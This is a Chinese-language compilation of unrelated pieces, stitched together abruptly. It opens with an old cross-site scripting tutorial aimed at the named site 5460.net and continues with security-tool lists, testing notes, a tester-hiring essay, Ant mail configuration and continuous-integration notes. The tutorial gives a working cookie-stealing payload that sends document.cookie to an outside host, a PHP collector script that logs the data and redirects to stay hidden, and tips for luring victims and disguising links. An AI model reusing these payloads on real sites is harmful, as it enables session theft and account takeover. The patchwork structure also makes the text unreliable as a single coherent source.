声明，请不要利用本文介绍的任何内容，代码或方法进行破坏，否则一切后果自负！

【漏洞成因】
原因很简单，就是因为CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换。

【漏洞形式】
这里所说的形式，实际上是指CGI输入的形式，主要分为两种：
1．显示输入
2．隐式输入
其中显示输入明确要求用户输入数据，而隐式输入则本来并不要求用户输入数据，但是用户却可以通 过输入数据来进行干涉。
显示输入又可以分为两种：
1． 输入完成立刻输出结果
2． 输入完成先存储在文本文件或数据库中，然后再输出结果
注意：后者可能会让你的网站面目全非！：（
而隐式输入除了一些正常的情况外，还可以利用服务器或CGI程序处理错误信息的方式来实施。

【漏洞危害】
大家最关心的大概就要算这个问题了，下面列举的可能并不全面，也不系统，但是我想应该是比较典 型的吧。
1． 获取其他用户Cookie中的敏感数据
2． 屏蔽页面特定信息
3． 伪造页面信息
4． 拒绝服务攻击
5． 突破外网内网不同安全设置
6． 与其它漏洞结合，修改系统设置，查看系统文件，执行系统命令等
7． 其它
一般来说，上面的危害还经常伴随着页面变形的情况。而所谓跨站脚本执行漏洞，也就是通过别人的 网站达到攻击的效果，也就是说，这种攻击能在一定程度上隐藏身份。

【利用方式】
下面我们将通过具体例子来演示上面的各种危害，这样应该更能说明问题，而且更易于理解。为了条 理更清晰一些，我们将针对每种危害做一个实验。
为了做好这些实验，我们需要一个抓包软件，我使用的是Iris，当然你可以选择其它的软件，比如 NetXray什么的。至于具体的使用方法，请参考相关帮助或手册。
另外，需要明白的一点就是：只要服务器返回用户提交的信息，就可能存在跨站脚本执行漏洞。
好的，一切就绪，我们开始做实验！：）

实验一：获取其他用户Cookie中的敏感信息
我们以国内著名的同学录站点5460.net为例来说明一下，请按照下面的步骤进行：
1． 进入首页http://www.5460.net/
2． 输入用户名“<h1>”，提交，发现服务器返回信息中包含了用户提交的“<h1>”。
3． 分析抓包数据，得到实际请求：
http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6
4． 构造一个提交，目标是能够显示用户Cookie信息：
http://www.5460.net/txl/login/login.pl?username=<script>alert(document.cookie)</ script>&passwd=&ok.x=28&ok.y=6
5． 如果上面的请求获得预期的效果，那么我们就可以尝试下面的请求：
http://www.5460.net/txl/login/login.pl?username=<script>window.open("http://www.notfound.org/ info.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6
其中http://www.notfound.org/info.php是你能够控制的某台主机上的一个脚本，功能是获取查询字符串的信 息，内容如下：
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."/n");
fclose($fp);
}
header("Location: http://www.5460.net");
注：“%2B”为“+”的URL编码，并且这里只能用“%2B”，因为“+”将被作为空格处理。后面的header语 句则纯粹是为了增加隐蔽性。
6． 如果上面的URL能够正确运行的话，下一步就是诱使登陆5460.net的用户访问该URL，而我们就可以 获取该用户Cookie中的敏感信息。
7． 后面要做什么就由你决定吧！

实验二：屏蔽页面特定信息
我们仍然以5460.net作为例子，下面是一个有问题的CGI程序：
http://www.5460.net/txl/liuyan/liuyanSql.pl
该CGI程序接受用户提供的三个变量，即nId，csId和cName，但是没有对用户提交的cName变量进行任何检 查，而且该CGI程序把cName的值作为输出页面的一部分，5460.net的用户应该都比较清楚留言右下角有你 的名字，对吧？
既然有了上面的种种条件，我们可以不妨作出下面的结论：
某个用户可以“屏蔽”其两次留言之间的所有留言！
当然，我们说的“屏蔽”不是“删除”，用户的留言还是存在的，只不过由于HTML的特性，我们无法从 页面看到，当然如果你喜欢查看源代码的话就没有什么用处了，但是出了我们这些研究CGI安全的人来 说，有多少人有事没事都看HTML源代码？
由于种种原因，我在这里就不公布具体的细节了，大家知道原理就好了。
注：仔细想想，我们不仅能屏蔽留言，还能匿名留言，Right？

实验三：伪造页面信息
如果你理解了上面那个实验，这个实验就没有必要做了，基本原理相同，只是实现起来稍微麻烦一点而 已。

实验四：拒绝服务攻击
现在应该知道，我们在某种程度上可以控制存在跨站脚本执行漏洞的服务器的行为，既然这样，我们 就可以控制服务器进行某种消耗资源的动作。比如说运行包含死循环或打开无穷多个窗口的JavaScript脚本 等等。这样访问该URL的用户系统就可能因此速度变慢甚至崩溃。同样，我们也可能在其中嵌入一些脚 本，让该服务器请求其它服务器上的资源，如果访问的资源比较消耗资源，并且访问人数比较多的话，那 么被访问的服务器也可能被拒绝服务，而它则认为该拒绝服务攻击是由访问它的服务器发起的，这样就可 以隐藏身份。

实验五：突破外网内网不同安全设置
这个应该很好理解吧，一般来说我们的浏览器对不同的区域设置了不同的安全级别。举例来说，对于 Internet区域，可能你不允许JavaScript执行，而在Intranet区域，你就允许JavaScript执行。一般来说，前者的 安全级别都要高于后者。这样，一般情况下别人无法通过执行恶意JavaScript脚本对你进行攻击，但是如果 与你处于相同内网的服务器存在跨站脚本执行漏洞，那么攻击者就有机可乘了，因为该服务器位于Intranet 区域。

实验六：与其它漏洞结合，修改系统设置，查看系统文件，执行系统命令等
由于与浏览器相关的漏洞太多了，所以可与跨站脚本执行漏洞一起结合的漏洞也就显得不少。我想这 些问题大家都应该很清楚吧，前些时间的修改IE标题漏洞，错误MIME类型执行命令漏洞，还有多种多样 的蠕虫，都是很好的例子。
更多的例子请参考下列链接：
Internet Explorer Pop-Up OBJECT Tag Bug
http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html
Internet Explorer Javascript. Modeless Popup Local Denial of Service Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html
MSIE6 can read local files
http://www.xs4all.nl/~jkuperus/bug.htm
MSIE may download and run progams automatically
http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html
File extensions spoofable in MSIE download dialog
http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html
the other IE cookie stealing bug (MS01-055)
http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html
Microsoft Security Bulletin MS01-055
http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html
Serious security Flaw in Microsoft Internet Explorer - Zone Spoofing
http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html
Incorrect MIME Header Can Cause IE to Execute E-mail Attachment
http://www.kriptopolis.com/cua/eml.html

跨站脚本执行漏洞在这里的角色就是隐藏真正攻击者的身份。

实验七：其它
其实这类问题和跨站脚本执行漏洞没有多大关系，但是在这里提一下还是很有必要的。问题的实质还 是CGI程序没有过滤用户提交的数据，然后进行了输出处理。举个例子来说，支持SSI的服务器上的CGI程 序输出了用户提交的数据，无论该数据是采取何种方式输入，都可能导致SSI指令的执行。当然，这是在服 务端，而不是客户端执行。其实像ASP，PHP和Perl等CGI语言都可能导致这种问题。

【隐藏技巧】
出于时间的考虑，我在这里将主要讲一下理论了，相信不是很难懂，如果实在有问题，那么去找本书 看吧。
1． URL编码
比较一下：
http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6
http://www.5460.net/txl/login/login.pl?username=%3C%68%31%3E&passwd=&ok.x=28&ok.y＝6
你觉得哪个更有隐蔽性？！

2． 隐藏在其它对象之下
与直接给别人一个链接相比，你是否决定把该链接隐藏在按钮以下更好些呢？

3． 嵌入页面中
让别人访问一个地址（注意这里的地址不同于上面提到的URL），是不是又要比让别人按一个按钮容易得 多，借助于Iframe，你可以把这种攻击变得更隐蔽。

4． 合理利用事件
合理使用事件，在某些情况上可以绕过CGI程序对输入的限制，比如说前些日子的SecurityFocus的跨站脚本 执行漏洞。

【注意事项】
一般情况下直接进行类似<script>alert(document.cookie)</script>之类的攻击没有什么问题，但是有时 CGI程序对用户的输入进行了一些处理，比如说包含在’’或””之内，这时我们就需要使用一些小技巧 来绕过这些限制。
如果你对HTML语言比较熟悉的话，绕过这些限制应该不成问题。

【解决方法】
要避免受到跨站脚本执行漏洞的攻击，需要程序员和用户两方面共同努力：
程序员：
1． 过滤或转换用户提交数据中的HTML代码
2． 限制用户提交数据的长度

用户：
1． 不要轻易访问别人给你的链接
2． 禁止浏览器运行JavaScript和ActiveX代码

附：常见浏览器修改设置的位置为：
Internet Explorer：
工具->Internet选项->安全->Internet->自定义级别
工具->Internet选项->安全->Intranet->自定义级别
Opera：
文件->快速参数->允许使用Java
文件->快速参数->允许使用插件
文件->快速参数->允许使用JavaScript.

【常见问题】
Q：跨站脚本执行漏洞在哪里存在？
A：只要是CGI程序，只要允许用户输入，就可能存在跨站脚本执行漏洞。

Q：跨站脚本执行漏洞是不是只能偷别人的Cookie？
A：当然不是！HTML代码能做的，跨站脚本执行漏洞基本都能做。

10万人主要集中在5个月的时间访问系统，再按2/8原则，计算系统访问量，

一、 简介

WebInspect：强大的网页程序扫描器

WebInspect对于专业人员不必多说，在黑客工具排名前100中能找到它的身影。

 SPI Dynamics' WebInspect应用程序安全评估工具帮您识别已知和未知的网页层漏洞。它还能检测到Web服务器的配置属性，以及进行常见的网页攻击，例如参数注入、跨网站脚本、目录游走等等。

发现Ajax安全缺陷的一个方法是借助于安全测试应用软件。这一方面，Cenzic的Hailstorm可以针对基于Ajax的Web应用程序进行精确动作分析。Hailstorm可以自动模拟某些最复杂的基于流的攻击，让开发者看到真实世界的黑客是如何攻入他们的Web应用程序并窃取安全数据的。
Hailstorm使开发者可以实时检查所有安全缺陷，以了解某些注入攻击代码如何被执行以及被攻击的目标Web应用如何响应。Hailstorm还从不同的技术角度来提供建议来修正代码。不过由于Web应用技术如此不同，Hailstorm只是给出了通用的修补建议，而不提供具体的修正代码。
根据Cenzic，当Ajax应用程序发出服务器请求时出现的两个主要安全弱点是：输入确认（诸如SQL和脚本注入）和授权。对开发者的关键挑战是要防止来自注入攻击的反馈信息。 
例如，当发出HTTP请求后，提交的参数被连接符号&分开，这使得黑客可以根据参数来查看服务器的响应。黑客可以创建定制的HTTP头，通过插入调用函数，服务器端就会运行恶意脚本。通过Hailstorm，开发者能够识别存在于HTTP头内的注入代码的安全缺陷。
Hailstorm还可以检查任何基于提交数据的注入攻击。对于有安全弱点的HTTP头，Hailstorm可以产生跨站点脚步攻击和SQL注入攻击来测试服务器请求和脚本执行。Hailstorm可以在HTTP头中插入空函数来看页面结构是否能被恶意函数改变。为了得到XML节点的信息和被调用的函数，黑客们通常喜欢使用空函数来接收来自服务器的信息。 由于Ajax请求通常是基于XMLHTTP协议的，开发者可以动态的改变提交数据的架构，以提供从Web应用到客户端浏览器的即时Ajax数据结果。但是这个功能也可以被利用。例如假如黑客可以改变任何函数的话，他们可以在页面上放一个类似弹出窗口类的垃圾信息。
观察攻击Ajax请求的最佳时间也是非常重要的，因为不是所有的Ajax方法调用都是有用的。在页面加载的时候，对页面所做的Ajax改变需要按照服务器端模块或内部终端用户的响应来进行，因为Ajax请求是一个中间请求。
内部终端用户的例子是那些需要计算来自银行或其他金融机构的表格的人们。为了测定那些Ajax请求会导致什么情况，Hailstorm在服务器端利用一个浏览器来跟踪内部用户的基于事件的响应，并跟踪那些请求一直到客户浏览器的页面加载。
举例来说，对表格数据执行了Ajax注入后，Hailstorm用户可以分析响应数据大小。假若内部用户点击了一个来自基于Ajax的SQL注入产生的JavaScript弹出窗口后，从Web应用中得来的数据会产生一个安全漏洞，使得黑客可以查看财政数据的表格。Hailstorm输出可以在页面加载的时候测定特定的产生这个漏洞的实例，方法是给每一个交易打上一个水印标识。这个功能可以模仿黑客实际所采取的做法，从而提供一个状态评估来维护Web应用的状态。

基于Widnows平台的电脑，有7类常见的安全测试工具，它们是：

　　1. 端口扫描 (Port scanners)
　　2. 网络/操作系统弱点扫描 (Network/OS vulnerability scanners
　　3. 应用程序/数据库弱点扫描 (Application/database vulnerability scanners)
　　4. 密码破解 (Password crackers)
　　5. 文件查找工具 (File searching tools)
　　6. 网络分析 (Network analyzers)
　　7. 漏洞检查工具

工具名称 相关站点 擅长方面
免费
SuperScan version 3 www.foundstone.com/resources/proddesc/superscan3.htm 快速并且易用的端口扫描器，可以在运行的系统中寻找开放的端口和正在运行的服务，抓取banner信息包括软件的版本。
SoftPerfect Network Scanner www.softperfect.com/products/networkscanner 映射MAC地址到IP地址，可以帮你定位随机的有线和无线的系统 
NetBIOS Auditing Tool (NAT) www.cotse.com/tools/netbios.htm 灵巧的Windows网络共享密码的破解工具
Winfingerprint http://winfingerprint.sourceforge.net Windows 信息列举工具，它可以搜索到补丁的等级信息，NetBIOS信息，用户信息等
Metasploit www.metasploit.org 一个强大的查找基于Windows平台弱点的工具
Cain & Abel www.oxid.it 一个很不错的混合密码破解工具
商用
QualysGuard www.qualys.com 强大且易用且全面的网络/操作系统弱点扫描工具，适用于上千种新老漏洞。
GFI LANguard Network Security Scanner www.gfi.com/lannetscan 一套完美的定位于Windows系统，功能强大且价格低廉的的网络/操作系统弱点扫描工具
N-Stealth www.nstalker.com 一款物美价廉的针对运行IIS的系统扫描工具
WebInspect www.spidynamics.com/products/webinspect/index.html 彻底的挖掘基于IIS，Apach等系统的Web应用程序弱点
WinHex www.winhex.com/winhex/index-m.html 查找运行程序遗留于内存中的敏感信息 -- 完全搜索类似于“密码”，“SSN”，等等之类的文本信息。以发现那些未清除干净的敏感信息
AppDetective for MS SQL Server www.appsecinc.com/products/appdetective/mssql 全面的SQL Server 数据库安全扫描工具
Proactive Password Auditor www.elcomsoft.com/ppa.html 一个效果明显且简单易用的用户密码破解工具 -- 支持Rainbow Table
Effective File Search www.sowsoft.com/search.htm 强大的文本搜索工具，适用于搜索本地文件或服务器上的共享文件。 -- 完全搜索类似于“密码”，“SSN”，等等之类的文本信息。 以发现那些未被保护的敏感信息
EtherPeek www.wildpackets.com/products/etherpeek/overview 完美的网络分析器，可以找出不怀好意的系统，未被认可的协议， 找出上层的讲话者, 以及更多

本文章来源于西盟软件站【www.zmke.com】详细地址：http://www.zmke.com/article/52/80/2006/20060826214.html

安全性测试（security testing）是有关验证应用程序的安全服务和识别潜在安全性缺陷的过程。
注意：安全性测试并不最终证明应用程序是安全的，而是用于验证所设立策略的有效性，这些对策是基于威胁分析阶段所做的假设而选择的。

安全测试内容主要有以下：
1。 用户认证机制  比如用户口令模式， 数字证书模式，智能卡模式，人像，指纹，声音模式等等。
       可以围绕以下展开：    未经授权是否可以通过绝对路径访问到需要鉴权的资源（网址）？
                                                登陆是否存在密码输入时显示明文，密码框没有使用标准的？
                                                退出后是否依然能使用鉴权资源的情况？

2。 加密机制。   主要涉及 公钥和私钥加密算法。
3。安全防护策略。 由于TCP/IP协议的脆弱性， 我们通过安全日日志，入侵检测，隔离防护，漏洞扫描等措施。
      测试的内容也就涉及： 模拟非授权攻击 看防护系统是否坚固
                                                采用成熟的网络漏洞检查工具看系统漏洞
                                                有关系统补丁是否打上等等
4。数据备份和修复
      数据是机密的完整的独立的受管理的。
      备份和修复是否及时
      备份和修复是否充分
      数据丢失造成的损失多大等等
5。 防病毒系统
      是否安装有效杀毒软件？是否能多种工具交叉查杀？等等

如何开展安全测试， 谈下测试方法。
1。 功能验证。   安全功能验证的测试方法采用传统的测试方法：白盒黑盒灰盒
2。 漏洞扫描。  主要有拒绝服务漏洞， 本地用户扩权漏洞，远程用户扩权漏洞。
3。 模拟攻击。
       服务拒绝型攻击  EG: 泪滴， SYN洪水， SMURF攻击， UDP洪水等等。
       漏洞木马型攻击  EG: 口令猜测，特洛依木马， 缓冲区溢出等。
       信息收集类技术   EG:扫描
       伪装欺骗型攻击： EG: ARP欺骗， IP欺骗等
       侦听技术  就是获取在网络上传输的信息

常见针对 Web 应用攻击的十大手段

目前常用的针对应用漏洞的攻击已经多达几百种，最为常见的攻击为下表列出的十种。

常见的安全性测试的测试方法，为大家提供测试学习方向：

1。 功能验证。   安全功能验证的测试方法采用传统的测试方法：白盒黑盒灰盒
2。 漏洞扫描。  主要有拒绝服务漏洞， 本地用户扩权漏洞，远程用户扩权漏洞。
3。 模拟攻击。
       服务拒绝型攻击  EG: 泪滴， SYN洪水， SMURF攻击， UDP洪水等等。
       漏洞木马型攻击  EG: 口令猜测，特洛依木马， 缓冲区溢出等。
       信息收集类技术   EG:扫描
       伪装欺骗型攻击： EG: ARP欺骗， IP欺骗等
       侦听技术  就是获取在网络上传输的信息。

7款网站开发测试实用工具

通常在发布新的网站、添加新功能或者升级系统之前，都需要进行测试。对程序员、设计人员和生意人来说，最糟糕的一件事情就是登陆到一个无法使用的网站，这会赶走客户，损害公司的声誉，并会导致更多的工作、更多的头痛事以及更多的利润损失。

　　幸运的是，目前有很多用于网络开发测试的强大工具。这些工具可以测试所有你所需要的，从CSS确认到网站速度。所有网站的共同目标都是：确保用户和客户顺利地使用网站服务。使用下面这些工具可以作为网站开发过程的最后步骤。

　　1. WebSitePulse测试工具

　　网址：http：//www.websitepulse.com/

　　想要快速测试响应时间、文件尺寸以及链接数量吗？WebSitePulse测试工具提供了一系列快速易用的测试方法，可以给出从网站速度到链接错误等所有的情况。还提供文件大小、转移速度以及DNS的数目。

　　2. 多浏览器测试工具Xenocode Browser Sandbox

　　网址：http：//www.xenocode.com/browsers/

　　浏览器测试是网站开发中最乏味和令人沮丧的部分。设计人员和程序员在测试网站在IE6平台效果的时候经常会大呼小叫。浏览器测试中另一个困难的部分就是没有任何的开发人员能够在同一台计算机中拥有所有的浏览器来进行测试。

　　进入XenoCode Brower Sandbox，它可以同时虚拟所有的常用浏览器，而不需要安装软件。遗憾的是，XenoCode Browser Sandbox在某些浏览器中运行速度很慢，并且目前还没有Mac版本。

　　3. Firebug Firefox 扩展插件

　　网址：http：//getfirebug.com/

　　这是所有的程序员最喜欢的扩展软件，Firebug是测试前端代码和CSS的最好的调试软件。如果出现任何不符合格式的图像或类型，最好的解决办法就是用Firebug检查出来。甚至可以在里面改变样式来检查网站是如何在浏览器中的渲染效果。

　　4. Load Impact负载测试软件

　　网址：http：//loadimpact.com/

　　如果一个网站正在运行病毒、Digg、Twitter和StubleUpon，一次汇聚了多种应用程序，它能够承受这种负载吗？Load Impact可以帮助回答这个问题。它在网络服务器上模拟大量的用户下载，来决定该网站是否能够承受高流量负荷。该软件拥有一个免费版本和几个付费版本。

5. Safari Web Inspector

　　网址：http：//www.apple.com/safari/

　　苹果公司的Safari网络浏览器的其中一个亮点就是网络监测功能。Web Inspector，仅在打开开发面板之后才可使用，它能显示类型表单、图像、网页上的脚本。虽然如此，Web Inspector最实用的部分就是它的Network功能，该功能实时地显示文件和脚本从服务器转换到浏览器的命令和速度。可以使用这款软件找出哪个脚本、文件或图像在浏览器中占用最大的空间，然后进行调整。

　　6. Web Developer Firefox Extension

　　网址：https：//addons.mozilla.org/en-US/firefox/addon/60

　　Web Developer是一款健壮的Firebox 插件，当测试一个网站的时候，所有开发人员都要参与其中。它提供了广泛的测试，包括测试受损的图片，测试多重屏幕尺寸的布局，查看cookie信息以及验证标记。对Firefox用户来说它是最终的测试工具。

　　7. W3C 验证服务

　　W3C是所有网站验证的标准。W3C Validator以工业标准为基础，查看网站的标记并显示错误信息。它有多种语言和种类。 下面是一些重要的验证工具：

　　-W3C Markup Validation 网址： http：//validator.w3.org/

　　-W3C CSS Validation 网址：http：//jigsaw.w3.org/css-validator/

　　-W3C mobileOK Checker 网址：http：//validator.w3.org/mobile/

　　-W3C Link Checker 网址：http：//validator.w3.org/checklink

　　-W3C Feed Validation Service 网址：http：//validator.w3.org/feed/

　　这些工具都可以用来尽早地检测出Bug来保证网站稳定高速运行的。至少可以让开发人员意识到，除了对着IE6显示的糟糕页面大呼小叫之外，他们还有很多选择。

浮躁的国内测试界－2006年测试人员招聘感悟

作者：陈大卫 来源：希赛网软件测试频道

我面试的测试应聘人员大多是有一定从业经验的测试人员，其中不乏优秀者，但是也有相当多的应聘人员反映出这样那样的问题，概括说来就是“浮躁”，具体拆解来看主要表现在以下几点。

一、根基不牢

问题：利用等价类划分的方法，对某问题设计测试用例。

分析：98%以上的应聘者只知道按照有效等价类和无效等价类进行划分，殊不知此种分类方法只是等价类划分的一个典型应用而已，等价类划分远非只能划分为有效和无效两类。根据种种划分依据，还可以进一步划分很多其他类别。

问题：根据事件描述，画出对应的因果图。

分析：标准答案中只画了“两条恒等，两条非，一个与，一个或”。如此简单的问题，上百名应聘者中竟然无一人答对，痛心啊。黑盒测试方法就那么几种，既然你已知这个名，怎么就不知道多看几眼。

★ 小结：

上面提到的是软件测试的最基本的方法，作为从业测试实际工作已经有1-2年的应聘人员，未能真正领悟，实属不应该，心浮气躁，忽视了你身边最简单，也是最厉害的技能。根基不牢，怎么可能把测试做深。

二、专业不精

问题：音视频文件都有哪些格式，这些格式之间有什么差别？

分析：此问题是问那些做过多媒体方面测试的，但是我们的应聘者向来都是拿来主义，别人给我什么媒体文件我就用什么做测试，而根本不管不问。“为什么MIDI文件比WAV文件小那么多？我们如何知道扩展名是.Mpeg的文件是Mpeg1格式的还是Mpeg2格式

1 如何用junit写测试？

1、创建一个TestCase的子类: 

1 ant中发送邮件

  <mail password="123" user="aaa" messagemimetype="text/html"  subject="Test sendmail" mailport="80" mailhost="mail.fulong.com.cn">
      <from address="aaa@fulong.com.cn"/>
   <to address="aaa@fulong.com.cn"/>
   <message>aaaaaaaaaaaaaaaa</message> 
   </mail>

注意：Ant发送邮件需要的相关支持包有：mail.jar和activation.jar
如果有错误，请确认这两个包是否已经存在于ant目录的lib中。

2 邮件服务器主机链接不上

nested   exception   is:   class   javax.mail.MessagingException:   Could   not   connect   to   SMTP   host:

原因，邮件服务器的端口号不对，邮件服务器的默认端口号是25.

3 判断资源文件是否存在

<?xml version="1.0" encoding="UTF-8"?>
<project name="testCondition">
    <path id="all.test.classes">        
         <pathelement location="bin"/>
     </path>
  <target name="mail">
 <mail   mailhost="pop.126.com "   mailport="25"   subject="Test   build">  
    <from   address="luojing_happy@126.com"/>  
    <to   address="luojing_happy@126.com"/>  
     <message>The   nightly   build   has   completed</message>  
 
  </mail> 
</target>
    <target name="test">
        <condition property="scondition">
            <available resource="TestTest.class">
                <classpath refid="all.test.classes" />       
            </available>
        </condition>
        <antcall target="isTrue"></antcall>
        <antcall target="isFalse"></antcall>       
    </target>
    <target name="isTrue" if="scondition">
     <antcall target="mail"/>

        <echo>is ture</echo>
    </target>
    <target name="isFalse" unless="scondition">
        <echo>is false</echo>
    </target>
</project>

持续集成 Java手册

一、概念

Martin Fowler的文章：Continuous Integration  中文翻译：持续集成

二、工具

传统工具：VisualStudio.Net，VisualSourceSafe，Rational ClearCase

自动编译工具：Ant

回归测试工具：JUnit

代码检查工具：CheckStyle

持续集成工具：CruiseControl

三、步骤

• CruiseControl监控远程版本控制系统的变化

• 变化发生时CruiseControl调用编译工具进行编译（Ant等）

• 编译成功后调用JUnit进行回归测试

• 编译成功后调用CheckStyle进行代码检查

• 完毕后将编译结果、测试结果、代码检查结果发送至开发人员、主管经理，并发布至网站，甚至报警器

    所有这一切都是按照编制好的脚本自动进行的

四、实施示例

目前我们使用的是ClearCase，主控软件为CruiseControl，其脚本文件为cccc.xml

• 配置远程版本控制系统

• 配置编译工具

• 配置测试用例（在ant的配置文件中）

• 配置报告形式

• 其中CruiseControl暂时没有提供代码检查工具的支持，建议使用Ant来调用CheckStyle，示例如下（没有真正运行过）：

五、几点提示

• CruiseControl会自动根据本地ClearCase的View监控远程VOB
• 其实除了监控远程版本控制系统外其它的任务都可以由Ant来完成，CC只负责监控变化并调用Ant即可
• 可以为cruisecontrol.bat加入启动参数“-port 8055”，这样可以用JMX（http://localhost:8055）来控制cc
• 最好避免中文路径，否则就需要手工为几个Xml格式的文件，如cc的report Servlet的Web.xml等加入编码方式“<?xml version="1.0" encoding="UTF-8" ?> ”，或者将中文路径映射为虚拟硬盘：“subst Y: "D:/cc_view/chelsea/Platform/开发/Nucleus2.0/Source"”
• 中文log无法正常显示时，需要设置CruiseControl配置文件中<log>元素的“encoding”属性，如：
  <log dir="D:/Tomcat 4.1/webapps/cruisecontrol/samplelogs" encoding="utf-8">

    <merge dir="D:/cc_view/chelseafc/Nucleus2.0/Port/test-results" />

  </log>
• 编译失败后，在下次checkin之前，一般不需要重新编译，这时可设置<project >的“buildafterfailed”属性为false来避免重新编译
• <htmlemail>的几个属性好像没有缺省设置，虽然文档里说从2.1.7开始有缺省设置，包括xsldir，css，logdir
• 各种工具的安装、使用，在各自的文档里都非常详细，网上亦有无数资源

六、参考资料

• DailyBuild全攻略
• Draco.Net
• 持续集成.Net手册